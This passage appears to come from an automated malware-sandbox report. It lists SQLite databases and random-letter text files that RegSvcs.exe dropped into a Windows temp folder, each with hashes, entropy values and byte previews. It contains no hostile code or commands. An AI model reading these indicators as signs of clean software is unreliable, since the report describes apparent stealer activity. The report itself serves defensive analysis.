File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7D79.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7D8A.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7D9B.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA1EF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696724055101702
Encrypted:	false
SSDEEP:	24:amL3nXTtZkQxqip7hViX2Zka12//5V9PP+Iw5ZrfqoV2P8S7FpwmKxlTn:xXL4ivV62qaI/xVhVWZ+X8SxKDT
MD5:	1FFF6A639C738561CDC01BD436BA77C1
SHA1:	BAFB1D68D43B177330F701BA01CA1AD19CB4FBB8
SHA-256:	C2279E62766B7EFD46442641AECB3D9A0A25CE999296AC5BA9DA7BF18B2BDA92
SHA-512:	65EFD5B1E235EF6AD917EAF95E16E3287CA9720F3F0EE989667A1DBB651693580415182F64FFA7538986E2BE7F19AC030836DF62489BB49C42383F5FCD3FA5D2
Malicious:	false
Preview:	NWCXBPIUYIVIMEKOECOAETPCBVGOLLFSFYSIEWGCQXXYDTHBXCBBHRPJYJIIAKLIVVLYHTWFXTIMRQKNXJVKYWJRGDPRAMVTWAMYMVUPBCODOHNWGVUTTMDRCGQSWUENMIVFDVUFWRBWWAXFGLJCWHJESVSORVMBBPZHMGNOLAZEBTVVZJSGFZDCEBOKEELVIKVUJUJMYXSQXAWBVPYELDJUPEKNZGLXBNUDAABLCYAZVPQYBYHWASQZIKCOZDJXTSUXLKTDHJGSYIZZEGRZZNKKDUJMXSRWEDSBIZWRCWGJILNJNQKYISXAGNMQIWLOTRVEMVUEFFBMOVSUOJIHGLPPIKHURRWPPLYGZVGPLTDDNFHWCGDYBJWXDCKVHBTKZNVCGFMGAYMEPNBBZNTBERBXWUZQOWOXLEBSIXOWEZFEHNZYOEPBPYERLPMITANPJUDWNRNURGGOVPAFPUMUFAJJGHCGGSHCPAKCRSPZJJODRADCRCMYZDUAIWBDBDCPBUYVIRSRMZFDRIJQLLRUECYTILJEKDTTKMJATFJZGEOYRXTQSNGOENKASOPKMGWIWBAOMVIDHMXGNZFQLDKEJHBNZOCNFNIXNHOKWJNDTYAWGDGLYPWBQMSVSXTAECOYAEULSBSJPKKFQWDJACOZKJGANAIJBUMCLKLMRCAXPGXPFJMMBITWGGANYVNUIAJQWHHSWFPPASKHZAUXVZCDBKOWYHZAGAZKRYAWMXNYMSOVNKLUSFMEKYZMJTXYMLLTDLXXHKEEHBYXXFBEBTALQHMYPVOGJLATHUICOJIIQJINSCWPMNRVRLYYRHLAJBLVHEDYTFSDAVKINLNNEEURYKXHNXJMZIQWVOJNOTKRUWHSVTMXWRNJWLJJHPIPSFMIAIWBMNDXXCXXZCPDOKGRINVUVYHCJLFDJIZCOEFTHTRHTIWRPLTKLXPUDEBCIHBMDJOHZRRRYIUNRRIECVWDGMFRWLRMKDBNVTLGPDQC

C:\Users\user\AppData\Local\Temp\tmpA1FF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697427014915338
Encrypted:	false
SSDEEP:	24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
MD5:	2D7ACA56B5F340F28DD1D2B46D700BA6
SHA1:	3966684FF029665614B8DC948349178FB9E8C078
SHA-256:	B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
SHA-512:	D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
Malicious:	false
Preview:	ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA

C:\Users\user\AppData\Local\Temp\tmpA210.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696724055101702
Encrypted:	false
SSDEEP:	24:amL3nXTtZkQxqip7hViX2Zka12//5V9PP+Iw5ZrfqoV2P8S7FpwmKxlTn:xXL4ivV62qaI/xVhVWZ+X8SxKDT
MD5:	1FFF6A639C738561CDC01BD436BA77C1
SHA1:	BAFB1D68D43B177330F701BA01CA1AD19CB4FBB8
SHA-256:	C2279E62766B7EFD46442641AECB3D9A0A25CE999296AC5BA9DA7BF18B2BDA92
SHA-512:	65EFD5B1E235EF6AD917EAF95E16E3287CA9720F3F0EE989667A1DBB651693580415182F64FFA7538986E2BE7F19AC030836DF62489BB49C42383F5FCD3FA5D2
Malicious:	false
Preview:	NWCXBPIUYIVIMEKOECOAETPCBVGOLLFSFYSIEWGCQXXYDTHBXCBBHRPJYJIIAKLIVVLYHTWFXTIMRQKNXJVKYWJRGDPRAMVTWAMYMVUPBCODOHNWGVUTTMDRCGQSWUENMIVFDVUFWRBWWAXFGLJCWHJESVSORVMBBPZHMGNOLAZEBTVVZJSGFZDCEBOKEELVIKVUJUJMYXSQXAWBVPYELDJUPEKNZGLXBNUDAABLCYAZVPQYBYHWASQZIKCOZDJXTSUXLKTDHJGSYIZZEGRZZNKKDUJMXSRWEDSBIZWRCWGJILNJNQKYISXAGNMQIWLOTRVEMVUEFFBMOVSUOJIHGLPPIKHURRWPPLYGZVGPLTDDNFHWCGDYBJWXDCKVHBTKZNVCGFMGAYMEPNBBZNTBERBXWUZQOWOXLEBSIXOWEZFEHNZYOEPBPYERLPMITANPJUDWNRNURGGOVPAFPUMUFAJJGHCGGSHCPAKCRSPZJJODRADCRCMYZDUAIWBDBDCPBUYVIRSRMZFDRIJQLLRUECYTILJEKDTTKMJATFJZGEOYRXTQSNGOENKASOPKMGWIWBAOMVIDHMXGNZFQLDKEJHBNZOCNFNIXNHOKWJNDTYAWGDGLYPWBQMSVSXTAECOYAEULSBSJPKKFQWDJACOZKJGANAIJBUMCLKLMRCAXPGXPFJMMBITWGGANYVNUIAJQWHHSWFPPASKHZAUXVZCDBKOWYHZAGAZKRYAWMXNYMSOVNKLUSFMEKYZMJTXYMLLTDLXXHKEEHBYXXFBEBTALQHMYPVOGJLATHUICOJIIQJINSCWPMNRVRLYYRHLAJBLVHEDYTFSDAVKINLNNEEURYKXHNXJMZIQWVOJNOTKRUWHSVTMXWRNJWLJJHPIPSFMIAIWBMNDXXCXXZCPDOKGRINVUVYHCJLFDJIZCOEFTHTRHTIWRPLTKLXPUDEBCIHBMDJOHZRRRYIUNRRIECVWDGMFRWLRMKDBNVTLGPDQC

C:\Users\user\AppData\Local\Temp\tmpA211.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697427014915338
Encrypted:	false
SSDEEP:	24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
MD5:	2D7ACA56B5F340F28DD1D2B46D700BA6
SHA1:	3966684FF029665614B8DC948349178FB9E8C078
SHA-256:	B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
SHA-512:	D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
Malicious:	false
Preview:	ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA

C:\Users\user\AppData\Local\Temp\tmpA231.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA242.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA252.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA253.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB19C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB1AD.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB1BD.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB1CE.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB1DF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB1EF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD972.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE574.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE584.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
